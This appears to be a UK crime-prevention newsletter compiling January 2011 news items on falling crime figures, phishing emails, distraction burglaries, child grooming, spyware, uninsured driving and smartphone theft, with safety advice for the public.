MURDER RATE LOWEST FOR 12 YEARS
(The Guardian, dated 20th January 2011)
http://www.guardian.co.uk

The murder rate in England and Wales has fallen from 644 to 619 over the last year to its lowest level for 12 years.

Official Home Office figures published today also show that overall crime fell 5% according to the British Crime Survey and by 7% according to police figures in the year to September 2010.

The latest set of quarterly crime figures suggest that the sustained long-term trend in the fall of crime since 1995 by more than 45% has continued despite the economic recession and the accelerating rise in unemployment.

The fall in the murder rate in the 12 months to September 2010 was accompanied by a 9% fall in gun crime and a 6% fall in knife offences. The 619 deaths recorded on the homicide index was the lowest since the 606 murders in 1997/98. In 2009/10 , 421 victims were male and 198 were female.

The murder rate in England and Wales over the past 50 years rose steadily from around 300 a year in the early 1960s to more than 1,000 in 2002/03 when 172 deaths were attributed to the activities of Dr Harold Shipman. They have declined sharply since that peak with the fall in domestic violence providing part of the explanation for the decline.

The Home Office figures published today show that England and Wales are in the middle of the European murder league at 13.5 deaths per million population. Finland tops the table at 23.4, followed by Scotland at 21.4, and Ireland on 20 per million. Northern Ireland now has a murder rate well below Scotland at 15.2. Austria has the lowest murder rate in Europe at 6.1 per million.

Both sets of crime figures, the British Crime Survey, which measures people's experience of crime, and the police recorded crime figures show continued substantial falls in offences bringing the risk of becoming a crime victim to a 30 year low.

The 5% fall in the British Crime Survey estimate includes an 18% drop in the category of theft from the person, a 12% fall in other theft of personal property, a 15% fall in car crime and a 7% drop in vandalism. However the BCS also records a 16% rise in 'other household thefts', a 9% rise in burglary and a 3% rise in bicycle thefts.

The police recorded crime figures which show an even greater fall of 7% include an 18% drop in criminal damage, 14% fall in car crime, and a 7% drop in domestic burglary.

The only rise recorded on the police figures is a 7% increase in sexual offences but Home Office statisticians continue to urge caution over this figure citing under-reporting and recent police campaigns to improve recording.

The good set of crime figures are accompanied by BCS evidence of continuing falls in concerns about antisocial behaviour and levels of fear of crime.

Keith Bristow of the Association of Chief Police Officers said the figures showed the risk of becoming a crime victim remained at a 30 year low.

"Nationally we have been working to improve all areas of sex offence investigation, with a particular emphasis on rape in domestic abuse cases. We remain determined to bring to justice people who commit sexual offences and we are making significant progress in this critical area, particularly around giving victims confidence to come forward and report these crimes and we need them to do so," he said.

The Home Secretary, Theresa May, welcomed the statistics and confirmed moves designed to boost public confidence in the crime figures including moving them from the Home Office to an independent body: "Any reductions in crime are welcome, however levels are still too high and we know these statistics only offer a partial picture about the level of crime," she said.

"More needs to be done to bring crime down and we need to take bold action to restore public trust in crime statistics.

"That is why I have asked the national statistician to lead a review and why we are moving the publication of crime statistics out of the Home Office to an independent body.

"Improving public trust and confidence in crime statistics is crucial if we are to improve transparency and empower local communities to hold authorities to account."

(21st January 2011)


 

RECORDED CRIME CONTINUES TO FALL IN ENGLAND AND WALES
(BBC News, dated 20th January 2011)
www.bbbc.co.uk

Recorded crime in England and Wales fell 7% in the year to the end of September 2010, official figures show.

There were falls in all main categories of crime, except sexual offences which were up by 7%.

But the British Crime Survey, which asks people about their experiences, rather than what the police record, suggested burglaries rose by 9%.

Officials said that was not statistically significant - but there was a 16% rise in all household theft.

The largest falls in police recorded crime were for criminal damage - down almost a fifth - and vehicle offences, such as break-ins, which fell 14%.

All violence recorded by the police fell 4% over the year and robberies fell by 5%. The BCS found no statistically significant change in the level of violence or household crime uncovered in its interviews.

There was also a decrease in people's perceptions of high levels of anti-social behaviour.

More than half of people said that police and local agencies, such as their councils, were dealing well with anti-social behaviour and local crime problems.

The number of homicides fell 4% to 619 in the year to the end of April 2010 - 25 fewer than the year before and the lowest number since 1997-98 when 606 were recorded.

As in previous years, about two-thirds of homicide victims were male, while about three-quarters of female victims knew the main suspect. The number of homicide victims under 16 went up from 49 to 52.

About a third of the killings involved a sharp instrument. And although the police recorded an overall 6% fall in firearms offences, the number of homicides from shootings rose marginally from 38 to 41.

Forty-one people were shot dead in 2009/10, up three on the year before.

Separate figures published earlier this week by the Metropolitan Police showed that in 2010 the number of homicides in London was at it its lowest level since 1978.

Chief Constable Keith Bristow, head of crime for the Association of Chief Police Officers, said the data showed the risk of being a victim of crime remained at "a 30-year low".

"Nationally, we have been working to improve all areas of sex offence investigation, with a particular emphasis on rape in domestic abuse cases," he said.

"We remain determined to bring to justice people who commit sexual offences and we are making significant progress in this critical area, particularly around giving victims confidence to come forward and report these crimes and we need them to do so."

"The homicide rate also remains at its lowest level on the homicide index in 12 years. These overall results are a strong indication of the efforts of our workforce and others to keep people safe."

Review launched
 
Home Secretary Theresa May said that officials were now launching a review of how crime figures were collected and published in an attempt to improve public confidence.

The review would look at ways of cutting costs while making the figures more coherent.

"Any reductions in crime are welcome, however levels are still too high and we know these statistics only offer a partial picture about the level of crime," Mrs May said.

"More needs to be done to bring crime down and we need to take bold action to restore public trust in crime statistics.

"That is why I have asked the national statistician to lead a review and why we are moving the publication of crime statistics out of the Home Office to an independent body.

"Improving public trust and confidence in crime statistics is crucial if we bare to improve transparency and empower local communities to hold authorities to account."

Recorded crime in England and Wales

% change in recorded crimes in the year to September 2010, compared with previous year. Source : British Crime Survey

Criminal Damage : down 18%
Domestic Burglary : down 7%
Other Burglary : down 10%
Offences against vehicles : down 14%
Other theft offences : no change
Robbery : down 5%
Violence against the person : down 4%
Sexual offences : up 7%
Drug offences : down 2%
Fraud and Forgery : down 1
TOTAL RECORDED CRIME : DOWN 7%

(21st January 2011)


 

MORE PHISHING

I have just been looking through my Internet Service Providers (ISP) Spam filter for my e-mail account. There were eleven e-mails all attempting to discover my banking details and passwords over the last 2 weeks

There were eight addressed to me as if I was a Lloyds Bank customer. The criminals ploy within the e-mail ranged from someone had gained "unauthorized access to my online account", two "system errors"( please verify details ), "difficulties verifying my account details" and lastly several "customers have been making a complaint about there records, please verify yours".

I also had a bogus NatWest Bank "Security Alert, access blocked to your account due to system error". Then a slighly more elaborate "Alert" from a false Halifax ( with a registered logo ) stating " we have temporary deactivate your account, provide your details for reactivation". Finally, a notice from a false HM Revenue and Customs; "you are eligible to receive a tax refund, please provide you banking details".

All of these bogus notifications came with links to websites where I could provide my details. These websites could steal my banking and other details ( ideal for identity theft ) or they could infect my computer with spyware so that the criminals could obtain other personal information.

Security software on your computer will not protect you against phishing attacks, other than saying that a piece of mail looks like spam ! If in any doubt about your account call you bank direct using a known telephone number, not one provided in a bogus e-mail.

(21st January 2011)


 

HACKERS "WAIT BEHIND MILLIONS OF PORN PAGES"
(Metro, dated 18th January 2011 author Ross McGuiness )
www.metro.co.uk

Almost half of all online searches that result in a malicious web attack were for porn, a study has revealed.

Criminals lie in wait behind hundreds of thousands of porn sites, web security firm Symantec warned.

It said 44 per cent of search terms which led internet users to malicious websites were for adult entertainment.

The company said it detected more than 4.4million malicious web pages per month last year after observing more than 310,000 web domains found to be harmful.

Symantec also warned that a large recruitment drive for cyber criminals takes place on underground internet forums, where step-by-step attack kits are being sold for as little as £10.

Such kits are becoming easier to use, meaning cyber crime is no longer limited to those with advanced programming skills. 'In the past, hackers had to create their own threats from scratch, limiting the number of attackers to a small pool of highly skilled cyber criminals,' said Stephen Trilling, senior vice-president at Symantec.

'Today's attack toolkits make it relatively easy for even a malicious novice to launch a cyber attack.

'As a result, we expect to see even more criminal activity in this area and a higher likelihood that the average user will be victimised.'

The kits are software programs that can be used to help launch widespread attacks on networked computers.

Symantec said 61 per cent of malicious web attacks can be attributed to these types of kits. It said the Zeus kit posed a serious threat to small businesses, which have fewer safeguards, by stealing bank account details.

(21st January 2011)


 

DISTRACTION BURGLARY
(Based on information received, dated 17th January 2011)
 
The victims

These distraction burglaries appear to be predominately aimed at the elderly and vulnerable.

The Criminals actions

- 38+ distraction burglaries have been committed in the period between Thursday 23rd September 2010 and Thursday 6th January 2011

- The female suspect calls upon the victim asking for the use of a pen and a piece of paper in order to leave a note for a relative who is a neighbour of the victim. The Suspect will follow the victim into their home and further distract them as 1 or 2 male suspects enter and search for property. Although the pen and paper Modus Operandi is most commonly used suspects also vary their methods

- The presence of the female suspect typifies the series

- The males are sometimes quite brazen in their approach and when seen will either ignore the victim, leave, or attempt to further distract them.

Current tally of offences

16 London Boroughs ( Metropolitan Police District ) affected - Waltham Forest (4 offences), Ealing (3 offences), Bromley (3 offences), Sutton (2 offences), Croydon (2 offences), Greenwich (2 offences), Bexley Heath (2 offences), Edmonton (2 offences), Brixton (1 offence), Hounslow (1 offence), Kingston (1 offence), Merton (1 offence), Barking and Dagenham (1 offence), Hillingdon (1 offence), Ilford (1 offence), Colindale (1 offence)

Areas outside the Metropolitan Police District have also been affected- Sussex (2 offences), Thames Valley Police (5 offences), Hertfordshire (3 offences). The Metropolitan Police Intelligance unit are awaiting details of further potential offences from Essex and Bedfordshire.

Action to take

- Do not allow strangers into you home for whatever reason.
- Always check company representatives ( utility companies etc ) pass cards before assuming they are genuine. Still do not allow entry if the visit is un-solicited ( you have not invited them to call ). Call their employer to check first, before allowing them entry.
- If a bogus caller calls. Lock your door and call 999.
- If you have experienced a bogus call of the nature described above Call Crimestoppers (0800 555 111) anonymously. This will allow the Police to get a better understanding of how and where these criminals are operating.

(17th Janaury 2011)


 

CHILDREN AS YOUNG AS 10 "GROOMED FOR SEX BY GANGS"
(BBC News, dated 17th January 2011)
www.bbc.co.uk

Children as young as 10 are being sexually exploited by organised gangs of men in cities across the UK, a leading charity says.

Barnardo's says it is working with more than 1,000 children who have been groomed, abused and trafficked for money, and the problem is growing.

It says a specific minister must be given formal responsibility for tackling the issue.

The Department for Education said it was determined to take action.

'Used and abused'
 
Barnardo's said it had 22 teams across the UK and all but one of them had come across organised child trafficking.

Anne Marie Carrie, Barnardo's new chief executive, told the BBC the problem was far more prevalent than it had previously thought and the 1,000 or so victims identified were "the tip of the iceberg".

She also said the average age of those abused had fallen from 15 to 13 in recent years.

"Children are being passed from man to man, home to home, city to city," she said. "It's the domestic trafficking of children for money. "This problem is getting worse in that it is getting more organised, certainly the grooming is becoming more organised using technology. "The children are as young as 10. These children are being used, abused and thrown away by organised gangs of men."

Earlier this month, two married British men of Pakistani origin were jailed in Derby for grooming and abusing several teenage girls. The former home secretary Jack Straw later claimed some Pakistani men believed white girls were "easy meat", but he was immediately criticised for his remarks.

Following the case, the Child Exploitation and Online Protection Centre (Ceop) announced that it had begun a study "to identify any patterns of offending, victimisation or vulnerability".

Ms Carrie said the children at the heart of the issue had "been forgotten as discussion has focused on the ethnicity of perpetrators in high-profile cases".

"Without a minister with overall responsibility the government response is likely to remain inadequate," she added.

A spokeswoman for Department of Education said: "Child sexual exploitation is an appalling crime - it is a form of child sexual abuse and must not be tolerated.

"This is a complex problem and we are determined to tackle it effectively by working collaboratively right across government and with national and local agencies."

'Heartless'
 
Penny Nicholls, director of children and young people at The Children's Society, echoed Ms Carrie's remarks and urged the government to make a single government minister responsible for the issue.

She said: "Too many children and young people are being sexually exploited in the shadows of society, groomed in secret by heartless gangs of sexual predators or bogus boyfriends who shower vulnerable children with gifts and lure them to be horrifically exploited, sometimes for years on end."

What to look out for in our children

Ms Carrie said there were a few typical signs that parents should look out for.

"First of all, that children get gifts they couldn't possibly pay for on their own - they're given mobile phones and various things, they're taken out, they're treated [with] things.

"Secondly, that children begin to be a bit more quiet and secretive about their friends.

"And thirdly, that they have very suspicious sleep-overs. Suddenly, sleep-overs become more prevalent."

(17th January 2011)


 

POLICE PROMOTE CRIMESTOPPERS PRODUCT
( Police Oracle, dated 12th January 2011)
http://www.policeoracle.com

The Crimestoppers charity is celebrating its 23rd anniversary with the launch of its first product to help the public to protect their property and deter would-be perpetrators.

Tayside and Wiltshire Police are endorsing Property Protector, a clear liquid forensically engineered as combination of micro-particles that retain fingerprint impressions when dabbed onto valuable items. These uniquely coded fingerprints can be exclusively registered to the rightful owner on a property registration database, thus enabling the tracing and identification of any stolen articles.

Michael Laurie, Chief Executive of Crimestoppers, said product sales would provide vital funds as well as protecting expensive gifts received over the festive season.

"These are challenging times and we need to find new ways to raise money whilst continuing our crime-fighting efforts. "With this product we are expanding our work to help people deter thieves and taking a more proactive and preventative approach in fighting crime," he added.

Lancashire Constabulary is also applying new forensic innovations with its Local Neighbourhood officer installing SelectaDNA, at a nursery school in Burnley, which has suffered a spate of five thefts in the last six months.

Thieves have caused significant damage estimated at around £1,000 as they broke into the buildings and managed to steal a scanner worth £400.

Officers have applied the forensic DNA tag to the interior and exterior of the nursery and issued a warning that anyone attempting to steal from the buildings can be traced.

SelectaDNA is a form of grease with its own code, which transfers onto skin, hair, clothes and shoes and cannot be washed away by anyone who comes into contact with it.

Suspects caught with the DNA attached to their body or items belonging to them are forensically linked to the scene of the crime.

Crimestoppers website : http://www.crimestoppers-uk.org/

Crimestoppers product webpage : http://www.crimestoppers-uk.org/crime-prevention/crimestoppers-property-protector

(15th January 2011)



POLICE BACKED WEB SUCCESS NETS SUPPORT
( Warwickshire Police )
http://onlinenews.warwickshire.police.uk

 

A domestic abuse support website in Warwickshire has proved so effective in getting the right help to people that a number of other local authorities have adopted the model.

WADA - Warwickshire Against Domestic Abuse (a group of over 30 agencies working together to tackle domestic abuse in Warwickshire) created the Talk 2 Someone website www.talk2someone.org in 2008. The secure website with secrecy controls brings together a range of support information for anyone affected by domestic abuse.

The site is regularly praised as an example of good practice and so far four local authorities in the country have been so impressed that they have adopted its layout and content.

Torbay Council and Devon County Council, Hertfordshire County Council, and Strathclyde Police Authority have all modelled their websites on Warwickshire's format.

Sue Ingram, Warwickshire's Domestic Abuse Manager and spokesperson for WADA was pleased that the website had impressed colleagues in other authorities. She said: "All the agencies involved in WADA inputted into the content of the Talk 2 Someone website which is both comprehensive but easy to navigate.

"This was recognised by the other authorities who have requested permission to adapt the style and content for their own areas, in many cases the translation has been verbatim.

"A unique feature of the website is the 'covering your tracks' section which prevents the site appearing in web browser histories and is important to victims who need to be extremely cautious when taking the first steps to leave an abusive relationship.

"The other authorities were also keen to duplicate this and we have agreed. We have been extremely pleased to share our knowledge and expertise across county boundaries in this way which will help more people to get access to the support they need."

Warwickshire County Councillor Richard Hobbs, Portfolio Holder for Community Protection added: "Through working together, agencies in Warwickshire all do a great job to support and protect people affected by domestic abuse and its far reaching consequences for families.

"It is pleasing to see some of this good practice acknowledged by other authorities and we are happy to work with them to help tackle the issue further afield."

WADA's Talk 2 Someone campaign provides a number of ways to seek help and information regarding domestic abuse including a free helpline number 0800 408 1552, available between 8am and 8pm Monday to Friday, and 9am to 5pm Saturday.

There is also a website - www.talk2someone.org.uk - which offers information and support for victims, families, friends and neighbours as well as perpetrators, who may be looking to turn things around. Last year 110 people sought counselling to change their behaviour.

(15th Janaury 2011)


ROAD TRAFFIC POWERS EXTENDED FOR NO INSURANCE
(UK Government - Central Office for Information )
www.coi.gov.uk

New powers to tackle uninsured driving will come into force within months, Road Safety Minister Mike Penning has announced. Under the new powers it will be an offence to keep an uninsured vehicle, rather than just to drive when uninsured.

Currently every responsible motorist pays an average £30 each year within their premiums to cover crashes involving uninsured and untraced drivers. It is also estimated that uninsured and untraced drivers kill 160 people and injure 23,000 every year.

Mike Penning said: "Uninsured drivers push up premiums for other motorists and often drive with no regard for other road users, so it is vital that we do everything we can to keep them off the roads.

"More than 400 uninsured vehicles are already being seized by the police every day but it is simply not possible to catch every uninsured driver in this way. That is why we are bringing in these new powers which will help us to take targeted action while freeing up police time to deal with the hard core of offenders."

Ashton West, Chief Executive at the Motor Insurers' Bureau, said: "Today's news marks a significant step forward in the fight against uninsured driving. This means that as enforcement can take place for both keeping and driving a vehicle without insurance there will be no place for illegal motorists to hide.

"Continuous Insurance Enforcement (CIE) will complement and run alongside existing police roadside enforcement, which has already reduced uninsured driving by 20%."

Under the new system:

- The DVLA will work in partnership with the Motor Insurers' Bureau to identify uninsured vehicles

- Motorists will receive a letter telling them that their vehicle appears to be uninsured and warning them that they will be fined unless they take action

- If the keeper fails to insure the vehicle they will be given a £100 fine

- If the vehicle remains uninsured - regardless of whether the fine is paid - it could then be seized and destroyed.

Vehicles with a valid Statutory Off Road Notice (SORN) will not be required to be insured.

The Department for Transport today made the Commencement Order to make it an offence to be the registered keeper of a vehicle which does not have insurance, as well as regulations to support this. Further regulations will be made shortly, allowing the scheme to come into force in the Spring.

Latest estimates are that around 4% (around 1.4 million) of GB motorists drive uninsured. The penalty for driving without insurance is a maximum fine of £5,000 and 6-8 penalty points. Around 242,000 offenders are convicted for uninsured driving every year.

Measures already introduced in the Serious Organised Crime and Police Act 2005 gave police improved access to the Motor Insurers' Bureau database and powers to seize vehicles. In 2009 around 180,000 vehicles were seized.

The Road Safety Act 2006 provided the primary powers for a new offence of being the keeper of a vehicle which does not meet insurance requirements. Further secondary legislation is now being made to bring these provisions into force.

The Motor Vehicles (Insurance Requirements) Regulations 2010 make provision for regulations in support of the offence of being the registered keeper of a vehicle which does not have insurance cover. This instrument makes exceptions to that offence, provides that liability to conviction for the offence may be discharged by paying a fixed penalty of £100 and provides for the disclosure of information in connection with enforcement.

(15th Janaury 2011)


 

INQUIRY INTO GROOMING OF GIRLS FOR SEX
(Metro, dated 10th Janaury 2011 author Hayden Smith )
www.metro.co.uk

The sexual grooming of teenage girls is being investigated by the specialist child abuse unit following the conviction of two Asian men

Experts from the Child Exploitation and Online Protection Centre (Ceop) are heading the inquiry, which comes after Mohammed Liaqat and Abid Saddique were jailed for abusing girls aged between 12 and 18.

Former home secretary Jack Straw sparked a backlash after claiming the conviction was evidence of a problem among young men in Britain's Pakistani community. Liaqat, 28, and Saddique, 27, were part of an Asian gang who befriended and groomed girls in Derby.

Mr Straw, who represents Blackburn, said such crimes were a 'specific problem' in the Pakistani community which needed to be 'more open' about the reasons.

While most sex offenders were white, 'there is a specific problem which involves Pakistani heritage men who target vulnerable young white girls', he told BBC2's Newsnight.

'We need to get the Pakistani community to think much more clearly about why this is going on and to be more open about the problems that are leading to a number of Pakistani heritage men thinking it is OK to target white girls,' Mr Straw said.

Young men were 'fizzing and popping with testosterone' but girls from the Pakistani community were 'off limits', leading them to seek other outlets for their desires, he suggested.

But fellow Labour MP Keith Vaz, who chairs the home affairs select committee, insisted the case was not symbolic of any 'cultural problem'.

'I don't think you can stereotype an entire community. What you can do is look at the facts of these national cases, give it to an agency, make a proper investigation,' he told BBC Radio 4's Today programme.

(15th Janaury 2011)


 

iPHONE FUEL RISE IN STREET CRIME
(Evening Standard, dated 10th Janaury 2011 author Justin Davenport)
www.thisislondon.co.uk

Thefts of the latest smartphones are driving a surge in street crime, Scotland Yard revealed today. New figures show that street robberies in London rose by more than eight per cent last year; driven largely by the popularity of expensive phones and gadgets such as iPhones, BlackBerrys and iPads; with the number of mobiles stolen in muggings shooting up by 22 per cent in 2010.

Police also highlighted the increasing theft of gold jewellery, primarily from Asian women as they launched a campaign urging people to care of their possessions.

There were a total of 31,841 street robberies recorded last year, an 8.3 per cent rise on the number in 2009. Between December 2009 and November 2010, 13,400 phones were snatched, costing an estimated total of £2.5million, with one in 10 muggings taking place near an Underground station.

Police warned that last year's increase in street crime was the first in four years, but emphasised the number of robberies was still low compared with 2006, when there were 43,063 offences.

Met commander Simon Pountain advised people to keep valuables hidden. He said: "Many robberies happen when people check their phones just after leaving Underground stations."

He added: "Every time we get the release of a so-called must-have gadget, such as the iPhone 4 or the latest BlackBerry, there are criminals who want them but do not want to pay for them."

Jewellery thefts rose by 14 per cent last year, with many involving gold jewellery being snatched in the street. Police saw a marked increase during the Hindu festival of Diwali, when the custom of wearing jewellery is popular among observers.

The rising value of precious metals has also fuelled demand for high-value items, according to the Met.

More patrols and covert teams are being deployed to target muggers in certain boroughs, after figures showed higher-than-average increases in street crime in Brent, Newham, Ealing, Hammersmith and Fulham, Southwark, Hackney and Waltham Forest.

(15th Janaury 2011)


 

THE UNIQUE CHALLENGE OF SPYWARE
( Webroot Software Inc, Boulder, Colorado )
www.webroot.com

The following is an edited extract from a business explanatory document called a "White Paper". The purpose is to explain technical problems in as near laymans terms as possible. The text is nearly there, but there are some "techy bits".

The purpose of the inclusion of this article is to encourage every computer owner (residential or business) of the importance of maintaining security on their own machine. Very basic security software is free, the more efficient proprietry versions on special offers cost between £20 and £25 for 3 PC's. So why not share the cost with friends or family members.

As this White Paper states, spyware has been created by criminals for financial gain. Keylogging software ( which monitors passwords etc ) could be used to remove the contents of your bank account. For business users it could be details of contracts or plans to register a patent. How costly would that be ? I would expect more than £20 to £25.

Important Differences to Know about Spyware and Viruses

Introduction

At first comparison, spyware and computer viruses might appear to have more in common than not. They are both malicious programs, they both impact system stability, and the effects of both can range from being a nuisance to inflicting serious damage. They are also both programs that require specialized tools for their removal.

And while these two different types of malicious programs might closely resemble each another at
first glimpse, there are significant differences:

• Unlike viruses, the motivations behind spyware are financial, which has driven rapid technical innovation and broad distribution.

• Spyware is curiously difficult to locate for research, requiring specialized, proactive methods for discovery.

• Removing spyware is especially complicated and problematic because newer versions are highly adept at remaining on a system.

• The business impacts of spyware are greater, as it compromises privacy, threatens assets and affects productivity beyond even the damage caused by viruses.

The bottom line is that spyware presents a unique and serious problem that requires its own dedicated defenses. As spyware rapidly proliferates today, its well-funded developers are creating increasingly sophisticated versions, and it is clear that solutions devoted to handling the intricacies of spyware are necessary.

In this paper we will closely examine the differences between spyware and computer viruses. The fi rst line of defense is education, and understanding the unique threat spyware poses is the first step in a practical plan for protection.


A Look at the Differences Between Spyware and Viruses

Designed to Hide

One important way spyware is distinguished from viruses is discoverability. Antivirus vendors are able to deploy passive techniques for identifying new viruses, such as "honey-nets" that capture the malicious programs as they replicate themselves across the Internet. Because antivirus vendors can rely on these more passive research methods, they have not been as prepared for the active approach necessary to combat the unique challenges of spyware detection.

In order to maintain a definitions database that will effectively defend its users from newly released forms of spyware, an anti-spyware provider must actively seek out new threats and their source location. Keeping up with hundreds of adware companies and thousands of spyware writers is a daunting task.
Furthermore, it is becoming even more specialized as increasingly advanced forms of spyware morph into new variations requiring more sophisticated approaches. There are several approaches to spyware research, but each is technically challenging and resource intensive. One of the more interesting approaches used involves using webcrawler technology to find new threats before they can infect end users. This automated
scanning of the Internet to identify new forms of spyware involves proprietary technologies and a specific understanding of spyware and its unique properties.

Difficult to Remove

Once installed on a system, the presence of spyware on the PC can be insidious. While viruses typically take the form of a single executable and might affect a few registry entries, spyware typically impacts multiple registry (*) entries and potentially leaves dozens of application files spread across the hard drive or deep within the hardware.

Sophisticated techniques are required to locate and remove these many components created by spyware applications. In addition, spyware is becoming increasingly sophisticated in its staying power. New spyware programs use complex approaches, such as running separate processes that monitor each other. These programs are capable of reinstalling components and repopulating registry entries that have been removed. They are also capable of randomizing various elements of the program so that they leave a different footprint and are harder to track. To further complicate matters, if left unchecked many spyware applications are capable of downloading additional programs.

When faced with more difficult removal efforts, antivirus programs are not sufficient. Even just to remove some viruses, leading anti-virus vendors have had to build completely separate custom removal tools.
Removing aggressive spyware is even more difficult. To be effective, an anti-spyware program must engage in the complex, multi-step process of extracting the spyware components and removing the traces left behind throughout the system. Spyware removal requires highly specialized techniques that are different from the fundamental processes performed by antivirus software.

Different Impact

Another important difference between spyware and viruses is the impact they make on computers and their users. Viruses are developed to cause mischief by clogging networks, bringing down systems, or in some cases, deleting information. Spyware, however, is designed to execute even more malicious objectives. In the hands of cyber criminals, spyware's impact can be devastating, enabling them to violate personal privacy, access proprietary information, and steal financial assets. This was the case in a recent headline-making cyber theft in which spyware was used to steal $423 million from Sumitomo Mitsui bank.


Unique Distribution

The way in which spyware proliferates is also different from viruses. For one, there are often more variants. While viruses may have a few variants or encourage copycat efforts, spyware is often
programmatically designed to spin off its own variations, which can lead to a substantially greater number of spyware programs to contend with.

In addition, while viruses are typically designed to spread themselves openly and obviously across networks, spyware is generally unwittingly downloaded and installed by computer users. Spyware's focus is on stealthy delivery, and thus it proliferates more "silently", which makes it more difficult to determine the scope of its dissemination. While antivirus solutions are focused on combating the more visible spread of viruses and worms, a spyware protection solution must be adept at exposing stealthy delivery methods.

Financially Motivated

Another important differentiator between spyware and viruses is the motivation for their creation in the first place. Viruses are often created by individuals or small groups with the intent of causing a nuisance, or testing their programming skills at the expense of others. Spyware, on the other hand, is financially motivated and represents a growing industry estimated at $2.5B.

Backed by legitimate organizations with substantial financial resources, spyware is becoming increasingly sophisticated, and increasingly more diffi cult and complex to manage. With a strong financial motivation behind its advancement, spyware protection will continue to require highly specialized techniques.

Note
(*) The Registry is the section within the Windows operating system that notes what programmes are working on a computer and how they interact with other programmes (Simplified description).

(15th January 2011)




POLICE TO HELP VULNERABLE VICTIMS OF ANTI-SOCIAL CRIME
BBC News, dated 4th Janaury 2011)
www.bbc.co.uk

Eight police forces in England and Wales have launched a project to help vulnerable victims of antisocial behaviour.

 

The seven-month Home Office pilot is designed to help quickly identify and protect victims most at risk. It will change the way police respond to calls and introduce a new system to more effectively log complaints.

It follows the death of Fiona Pilkington who killed herself and her disabled daughter after years of abuse. They had suffered 10 years of torment at the hands of a gang of youths who taunted them and pelted their home in Leicestershire with stones, eggs and flour.

The projects, in Avon and Somerset, Cambridgeshire, Leicestershire, Lincolnshire, London, South Wales, Sussex and West Mercia, will run until July.  They will focus on creating an effective call-handling system, which will better identify the most vulnerable victims, and improve information-sharing between the police and other agencies like social services.

They will also engage with communities to "clearly set out the issues which are causing the most harm to individuals and neighbourhoods" and how they will be tackled, the Home Office said.

Kim Langley, from Fareham in Hampshire, told the BBC she was disappointed by the police response when she reported verbal abuse and damage to her home. "They'd send somebody out - we normally got a PCSO [police community support officer] come round - and we'd give them all the details, they'd write it all down, off they'd go again. "A couple of weeks later... we'd get a letter saying there was nothing they could do, after extensive inquiries, because there was no evidence for them to follow."

Crime Prevention Minister James Brokenshire said it was "not acceptable that those most in need either slip through the net or are plain ignored". "The technology exists to allow agencies to introduce a smart way of handling such complaints and a simple way of sharing information - they need to use it," he said. "It is essential those who raise the alarm and ask for help are listened to and their complaints acted upon promptly."

Repeat callers
 
Leicestershire Police was strongly criticised following the deaths of Ms Pilkington and her daughter, but Ch Insp Nick Glynn told the BBC that many improvements had been made since.

"One of the significant changes we have made is that we now record anti-social behaviour in exactly the same way as we do crime," he said. "So we make sure we pick up people who are repeat callers and make sure they don't slip through the net."

Ch Insp Glynn said Leicestershire's involvement in the project would help its good practice spread to other forces. But he said that in cases of "lower level antisocial behaviour", ordinary people could "take responsibility themselves" and reproach those causing trouble.

Home Secretary Theresa May has also called for communities to take action to help make antisocial behaviour "unusual, abnormal and something to stand up to".

(4th January 2011)


 

GANG MEMBERS TAUGHT FIRST AID FOR STAB WOUNDS
(The Guardian, dated 30th December 2010 author Amelia Hill)
www.guardian.co.uk

Rehabilitation course in Liverpool gives life-saving skills to young offenders involved in knife and gun crime.

Teaching young, violent criminals the first aid techniques that could save the lives of fellow gang members might seem a dangerous move but a new project doing exactly that is gaining the attention of youth offending teams across the country.

The brainchild of a group of medical students at Liverpool University, the course specialises in teaching teenagers already involved in knife and gun crime the skills to give pre-hospital care immediately after a penetrating injury.

The two-week Basics course is now a core part of Liverpool's Young Offenders Team's restorative justice programme. Youth offending experts in Nottinghamshire and medics in London have also expressed interest.

"The course changed my life," said Michael, 16, who was convicted of threatening a rival gang member with a blade earlier this year. "It makes you think, because you realise you can kill someone really easily with a knife. There's no safe place on the body to stab someone. I had a friend who was stabbed recently. I would have been a lot more help to him if I'd done this course when it happened. But it's good to know all this stuff in case I'm in that situation again," he added. "I've told my friends what I've learned here, so now they all know the basic first-aid techniques too."

World Health Organisation research showed that knives were used in almost four out of 10 killings of young people in the UK last year, more than any other weapon. The cost to the NHS of the combined injuries of gun and knife crime is more than £3m a year, according to the Trauma Audit Research Network.

In Merseyside alone, the tragic toll of teenage killings includes Rhys Jones, who was 11 when 18-year-old Sean Mercer shot him in the back in 2007. Three years earlier, Anthony Walker, 18, was murdered in a racially motivated attack with an ice pick by Michael Barton - brother of footballer Joey Barton - and his cousin, Paul Taylor.

Nick Rhead, a fifth-year medical student, co-devised the Liverpool YOT course after realising the majority of 11- to 16-year-old offenders attending his general first aid class had known someone who had been stabbed or shot - or had been the victim or had stabbed someone themselves.

"I realised we had a valuable opportunity to make genuine contact with young people involved in extremely high-risk behaviours, who had to engage with us because it was part of their court order," said Rhead who, along with his fellow medical students, teaches the course on a voluntary basis.

"Talking to them, we realised knife violence isn't just the preserve of drug dealers and gangs involved in territory disputes. For young people today, it almost seems like a game. It's part of everyday gang culture to stab someone in the back of the knee or the arm. They don't realise they can kill someone like that. At the same time, they are a reservoir of potential healthcare providers."

The course, which all newly convicted violent and non-violent young offenders must attend, teaches the basic principles of haemorrhage management, with cardiopulmonary resuscitation and the recovery position in two 90-minute sessions.

The course has the full support of Steve Boote, senior practitioner in restorative justice at the YOT. "Knife and gun crime is so common nowadays that it seemed common sense to teach every young offender the basics of specialised first aid," he said.

"The beauty of this project is that you have someone from the YOT sitting in to make sure the young people engage," he added. "I have the power to rule them as having breached their court order if they refuse to take part, and return them to court."

A controversial aspect of the scheme is that the medical students and YOT team workers do not try to dissuade the young people from violent behaviour.

"We don't want to say they should never stab people because that's not what we're about," said Rhead. "We hope the course will speak for itself and change their behaviour but we don't preach to them. They know it's wrong. We're just there to reduce mortality and make sure the consequences of any violence are limited.

"It's unlikely to increase incidents by giving the children the idea that they can cope with the consequences of violence," he added. "These are young people already engaging in high-risk behaviour."

Luke, an 18-year-old former offender who attended the course earlier this year, agreed. "After doing this project I have stopped going around with those sorts of people because I realised that the consequences of getting mixed up in this sort of thing are too serious. I've persuaded a couple of my friends to come with me.

"Another thing I realised was how bad knife wounds can make you look for ever. Even if you later decide to leave all that sort of thing behind you, if you've got a massive knife scar on your face, it would really put anyone off employing you. It made me think," he added.

(4th January 2011)


 

EUROPEAN CRIME CENTRE PROPOSED IN FIGHT AGAINST CYBER CRIME
(Courtesy of : Computer Active, dated 20th December 2010 author Dinah Greek)
www.computeractive.co.uk

